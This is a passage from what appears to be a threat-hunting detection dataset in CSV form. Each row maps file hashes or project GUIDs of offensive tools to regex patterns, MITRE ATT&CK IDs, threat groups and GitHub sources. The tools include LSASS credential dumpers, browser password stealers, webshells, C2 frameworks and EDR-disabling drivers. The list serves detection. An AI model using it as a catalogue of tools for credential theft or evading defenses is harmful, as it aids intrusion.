Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","37209" "*c76b2b12624877a95f172da43a31f7946c13c6bda3b792610411f7c709c8069b*",".{0,1000}c76b2b12624877a95f172da43a31f7946c13c6bda3b792610411f7c709c8069b.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37210" "*c77c84a7ec144daa151410334db7f90855c8406c5d205d9c68082902018ac2cd*",".{0,1000}c77c84a7ec144daa151410334db7f90855c8406c5d205d9c68082902018ac2cd.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","37211" "*c786890a660e4bca317ce667bc660504f8167a5d5965867d748ed02d0caa5046*",".{0,1000}c786890a660e4bca317ce667bc660504f8167a5d5965867d748ed02d0caa5046.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","#filehash","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","37212" 
"*c7874c257949a3c09dcb16f17c6fdb5ea0c5adb143004e7cc4adc63eb3ed785c*",".{0,1000}c7874c257949a3c09dcb16f17c6fdb5ea0c5adb143004e7cc4adc63eb3ed785c.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","0","#filehash","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","37213" "*c787d2dcdb5ea2184d90206ffd7da618a71d51383888b3d8564a9c71e7f100c4*",".{0,1000}c787d2dcdb5ea2184d90206ffd7da618a71d51383888b3d8564a9c71e7f100c4.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","37214" "*c7895e40feadeded96faf3a9c5fb0423bc16c5005aa419771c70849e9679e807*",".{0,1000}c7895e40feadeded96faf3a9c5fb0423bc16c5005aa419771c70849e9679e807.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","#filehash","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","37215" "*c78a157fbea4f59374fa0b274ab267549a664023443da600524146a13eb8b214*",".{0,1000}c78a157fbea4f59374fa0b274ab267549a664023443da600524146a13eb8b214.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 
- T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","37216" "*c794d9b0bef6c7d8838f5130e2e0ae4c8bed3ec35cfb9bf502520dcfab38bde2*",".{0,1000}c794d9b0bef6c7d8838f5130e2e0ae4c8bed3ec35cfb9bf502520dcfab38bde2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37219" "*c7985c82769ce2d6d68e3ed3926df1bc47523990c56cfa1ebe3e511e4b96a903*",".{0,1000}c7985c82769ce2d6d68e3ed3926df1bc47523990c56cfa1ebe3e511e4b96a903.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","37220" 
"*c79e051bb46302d29235045e7ce05e9806e52f7fdc0249a9593cd8fa01e11c35*",".{0,1000}c79e051bb46302d29235045e7ce05e9806e52f7fdc0249a9593cd8fa01e11c35.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/Xiebro-Plugins","1","0","#filehash","N/A","10","10","46","8","2025-02-27T09:17:31Z","2024-02-18T02:01:06Z","37222" "*C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4*",".{0,1000}C7A0003B\-98DC\-4D57\-8F09\-5B90AAEFBDF4.{0,1000}","offensive_tool_keyword","ATPMiniDump","Dumping LSASS memory with MiniDumpWriteDump on PssCaptureSnapShot to evade WinDefender ATP credential-theft. Take a look at this blog post for details. ATPMiniDump was created starting from Outflank-Dumpert then big credits to @Cneelis","T1003 - T1005 - T1055 - T1218","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/b4rtik/ATPMiniDump","1","0","#GUIDproject","N/A","N/A","3","255","46","2019-12-02T15:01:22Z","2019-11-29T19:49:54Z","37223" "*C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4*",".{0,1000}C7A0003B\-98DC\-4D57\-8F09\-5B90AAEFBDF4.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. 
while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#GUIDproject","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","37224" "*C7A5E6480C6CEC01E3627AE0A8EAC1FFE13226C560D4E4C05FCE1CAB1168CC8D*",".{0,1000}C7A5E6480C6CEC01E3627AE0A8EAC1FFE13226C560D4E4C05FCE1CAB1168CC8D.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","37225" "*c7afaf55e64fcbcae026383afb4f2576317dc3288fbda8652506e28fe71f10dc*",".{0,1000}c7afaf55e64fcbcae026383afb4f2576317dc3288fbda8652506e28fe71f10dc.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","37227" "*c7b633d9ffcddd84074219649dae082184e2331c07b395db5e2ffa9abe316355*",".{0,1000}c7b633d9ffcddd84074219649dae082184e2331c07b395db5e2ffa9abe316355.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential 
Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","37229" "*c7b76c0c337dcc31eeef08d0ae74254b810f5e0aac54a9ff06c6f87cef8a1436*",".{0,1000}c7b76c0c337dcc31eeef08d0ae74254b810f5e0aac54a9ff06c6f87cef8a1436.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37230" "*c7bac4df389bcfe3073fefde8fea9fc0d1057fbda2a329ad29a1566f9ded6d8d*",".{0,1000}c7bac4df389bcfe3073fefde8fea9fc0d1057fbda2a329ad29a1566f9ded6d8d.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","37231" "*c7bbfa266cc73f87a47186afadea101ceb03f759cf4b927a25dd1004d56ea07e*",".{0,1000}c7bbfa266cc73f87a47186afadea101ceb03f759cf4b927a25dd1004d56ea07e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37232" "*c7bdcebe60356900dc4b4f8bc8b75acc1536df33ae7a1049bfa27192b8c62d0a*",".{0,1000}c7bdcebe60356900dc4b4f8bc8b75acc1536df33ae7a1049bfa27192b8c62d0a.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","37233" "*c7c0c7e68bcc0ce7fbb15505434740e0528ab1240eeb8c3a123c3d84b8f6eefa*",".{0,1000}c7c0c7e68bcc0ce7fbb15505434740e0528ab1240eeb8c3a123c3d84b8f6eefa.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37235" 
"*c7c2b1295dbc6b5b13330310465c771108fdeff7e7b37447bc449f6c535cfa62*",".{0,1000}c7c2b1295dbc6b5b13330310465c771108fdeff7e7b37447bc449f6c535cfa62.{0,1000}","offensive_tool_keyword","keywa7","The tool that bypasses the firewall's Application Based Rules and lets you connect to anywhere","T1090.001 - T1071.004 - T1071.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/keywa7/keywa7","1","0","#filehash","N/A","6","1","61","9","2024-08-19T08:09:33Z","2024-08-05T15:27:26Z","37236" "*c7c8b6fb-4e59-494e-aeeb-40cf342a7e88*",".{0,1000}c7c8b6fb\-4e59\-494e\-aeeb\-40cf342a7e88.{0,1000}","offensive_tool_keyword","ChromeStealer","extract and decrypt stored passwords from Google Chrome","T1555.003 - T1003.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/BernKing/ChromeStealer","1","0","#GUIDproject","N/A","8","2","145","18","2024-07-25T08:27:10Z","2024-07-14T13:27:30Z","37238" "*c7d0e470542ece3342535057e01e84b962b19959e5142aa61633f49ebaa52775*",".{0,1000}c7d0e470542ece3342535057e01e84b962b19959e5142aa61633f49ebaa52775.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","37239" "*c7d3092d358e4828259d3b137eec1edeab112e2a70920c5912c76724e956ba47*",".{0,1000}c7d3092d358e4828259d3b137eec1edeab112e2a70920c5912c76724e956ba47.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential 
Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","37240" "*c7d41f5a0fe15661632d70cde6b34787f87e4818d7c592ffa0c5b074fdb15712*",".{0,1000}c7d41f5a0fe15661632d70cde6b34787f87e4818d7c592ffa0c5b074fdb15712.{0,1000}","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux user","T1003.007","TA0006 - TA0002 ","N/A","TeamTNT","Credential Access","https://github.com/huntergregal/mimipenguin","1","0","#filehash #linux","N/A","10","10","3940","644","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z","37241" "*c7d4de4e194b708aab0871da2661efd18074a9899a6ea784a4c7695ea5ae3c88*",".{0,1000}c7d4de4e194b708aab0871da2661efd18074a9899a6ea784a4c7695ea5ae3c88.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37242" "*c7e3c249f4c41a4abcb5135a08c2e18b2db67843b9b5d0b023f84b60b9403207*",".{0,1000}c7e3c249f4c41a4abcb5135a08c2e18b2db67843b9b5d0b023f84b60b9403207.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37246" "*C7E4B529-6372-449A-9184-74E74E432FE8*",".{0,1000}C7E4B529\-6372\-449A\-9184\-74E74E432FE8.{0,1000}","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). 
To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","0","#GUIDproject","N/A","9","","N/A","","","","37247" "*c7eb26b422e1aa10706906aedb442dcc80a5b078e9e83f814f945bb46503a1f4*",".{0,1000}c7eb26b422e1aa10706906aedb442dcc80a5b078e9e83f814f945bb46503a1f4.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","37249" "*c7ef467eeb99aa4aae717d0e258019ab5b7e176da4906a135d86e78faa9251cc*",".{0,1000}c7ef467eeb99aa4aae717d0e258019ab5b7e176da4906a135d86e78faa9251cc.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","37250" "*C7F1F871-8045-4414-9DC3-20F8AA42B4A1*",".{0,1000}C7F1F871\-8045\-4414\-9DC3\-20F8AA42B4A1.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation 
tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","37252" "*c7f3651ef551ed09c01349a493760935c2e22c36934e7604dbf4d61e2f0797e8*",".{0,1000}c7f3651ef551ed09c01349a493760935c2e22c36934e7604dbf4d61e2f0797e8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37253" "*c7f3f560c94164a7ed168b1ea7c5edf9e0cda3a9fe1a7e3918c1de6378444869*",".{0,1000}c7f3f560c94164a7ed168b1ea7c5edf9e0cda3a9fe1a7e3918c1de6378444869.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","37254" "*c7fa65795c3627674274f83ccab5776c80922708787a2121ac4d5cfd02551fc4*",".{0,1000}c7fa65795c3627674274f83ccab5776c80922708787a2121ac4d5cfd02551fc4.{0,1000}","offensive_tool_keyword","Dispossessor","script used to install anydesk by the Dispossessor group","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","37255" "*c7fe63930a8f7983a9c2989ce91628bf852349d77842bfbd5d77543c47a7dd74*",".{0,1000}c7fe63930a8f7983a9c2989ce91628bf852349d77842bfbd5d77543c47a7dd74.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37256" "*c7ff56000d015b06e6767e9bd7f2164e3876011d98ccd242c9d98dc11036d96a*",".{0,1000}c7ff56000d015b06e6767e9bd7f2164e3876011d98ccd242c9d98dc11036d96a.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","37257" "*c7ffb81b3cd5cfcfe18363f998cd64428423814d5a8713d89e7992941884587d*",".{0,1000}c7ffb81b3cd5cfcfe18363f998cd64428423814d5a8713d89e7992941884587d.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","37258" "*c80284ccc6e7c2dab2845923cf4eb2eb02b87292df93f65fd1c54ec726b537fc*",".{0,1000}c80284ccc6e7c2dab2845923cf4eb2eb02b87292df93f65fd1c54ec726b537fc.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - 
TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37259" "*c804c43c43da61b4430b75946cff6c92443104eaaf8a7b31c6ec885159cd6ff7*",".{0,1000}c804c43c43da61b4430b75946cff6c92443104eaaf8a7b31c6ec885159cd6ff7.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","37260" "*c80bf6d8d9a8c8f9671e8723922c89d8dd7263696f7708c0ace76ce66b947a7a*",".{0,1000}c80bf6d8d9a8c8f9671e8723922c89d8dd7263696f7708c0ace76ce66b947a7a.{0,1000}","offensive_tool_keyword","BadRentdrv2","A vulnerable driver (BYOVD) capable of terminating several EDRs and antivirus software","T1562 - T1068 - T1210 - T1489 - T1496","TA0005 - TA0004 - TA0040","N/A","Agrius","Defense Evasion","https://github.com/keowu/BadRentdrv2","1","0","#filehash","N/A","10","1","95","20","2024-12-26T13:43:18Z","2023-10-01T18:24:38Z","37262" "*c80dcbdd89540bef5fa286f7c4614747479a60890a400367dd469bf5b3fa2618*",".{0,1000}c80dcbdd89540bef5fa286f7c4614747479a60890a400367dd469bf5b3fa2618.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","37264" 
"*c8136e16bcb8f48bfe975afa4a490f47c6ea96063380cbed21a95ac1c1f73dcc*",".{0,1000}c8136e16bcb8f48bfe975afa4a490f47c6ea96063380cbed21a95ac1c1f73dcc.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37265" "*c821704956c03e7edc23f0eab92bb7ecb668cf34016c523101681c608645da67*",".{0,1000}c821704956c03e7edc23f0eab92bb7ecb668cf34016c523101681c608645da67.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","37267" "*c8273217f19cd8f6f693c350dea5bd6fff1ced10bf83174bbabab4656579c3cb*",".{0,1000}c8273217f19cd8f6f693c350dea5bd6fff1ced10bf83174bbabab4656579c3cb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37268" "*C82E994585B5C08F7259B00BD5F91AD45FCC8E42B4BF6A3CA989278D0A63BACF*",".{0,1000}C82E994585B5C08F7259B00BD5F91AD45FCC8E42B4BF6A3CA989278D0A63BACF.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","37269" "*c83cac1c4228e554b93ead6aa834427b52f420dd0beda7d7130dbf565fc3ee14*",".{0,1000}c83cac1c4228e554b93ead6aa834427b52f420dd0beda7d7130dbf565fc3ee14.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon 